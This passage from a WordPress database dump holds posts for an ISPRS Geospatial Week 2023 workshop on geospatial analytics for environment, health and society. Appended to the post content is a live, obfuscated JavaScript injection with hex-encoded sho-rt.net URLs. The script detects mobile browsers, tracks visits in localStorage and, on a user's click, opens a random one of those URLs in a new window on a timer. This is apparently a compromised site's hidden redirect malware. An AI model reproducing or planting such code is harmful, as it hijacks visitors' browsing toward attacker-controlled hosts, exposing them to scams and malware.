_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-12-06 05:50:19','2022-12-06 05:50:19','',3233,'https://gsw2023.com/?p=3426',0,'revision','',0),
(3427,1,'2022-12-07 03:54:55','2022-12-07 03:54:55','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</span></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\r\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\r\n<h5><em> </em></h5>\r\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\r\n<table width=\"588\">\r\n<tbody>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\r\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\r\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\r\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\r\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\r\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em>\r\n\r\n&nbsp;\r\n\r\nThe main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.\r\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\r\n&nbsp;\r\n\r\nI.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.\r\n\r\n&nbsp;\r\n\r\nII.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.\r\n\r\n&nbsp;\r\n\r\nIII.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.\r\n\r\n&nbsp;\r\n\r\nIV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?\r\n\r\n&nbsp;\r\n\r\nV.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes\r\n\r\n&nbsp;\r\n\r\nVI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\r\n<ul>\r\n 	<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\r\n 	<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\r\n</ul>\r\nare the supporting working groups.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Scientific Committee:</u></h5>\r\n<ul>\r\n 	<li>Peng Yue, Wuhan University, PR China</li>\r\n 	<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\r\n 	<li>Dr Suchita Gopal, Boston University. USA</li>\r\n 	<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\r\n 	<li>Dr Fazlay Faruq, University of Mississippi USA</li>\r\n 	<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\r\n 	<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\r\n 	<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\r\n 	<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\r\nThe authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</strong>','','publish','closed','closed','','geospatial-data-analytics-for-physical-geography-impact-assessment-on-environment-health-and-society','','','2023-02-05 14:41:38','2023-02-05 14:41:38','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3427',0,'dt_portfolio','',0),
